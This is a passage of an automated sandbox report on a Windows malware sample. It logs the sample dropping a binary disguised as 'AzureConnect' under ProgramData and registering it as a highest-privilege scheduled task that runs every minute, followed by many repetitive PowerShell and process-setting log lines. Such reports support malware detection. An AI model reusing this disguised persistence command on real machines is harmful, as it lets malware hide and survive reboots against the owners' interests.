            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848FD2316 push 8B485F95h; iretd 10_2_00007FF848FD231B
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeCode function: 15_2_00007FF848F300BD pushad ; iretd 15_2_00007FF848F300C1
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeCode function: 16_2_00007FF848F300BD pushad ; iretd 16_2_00007FF848F300C1
            Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
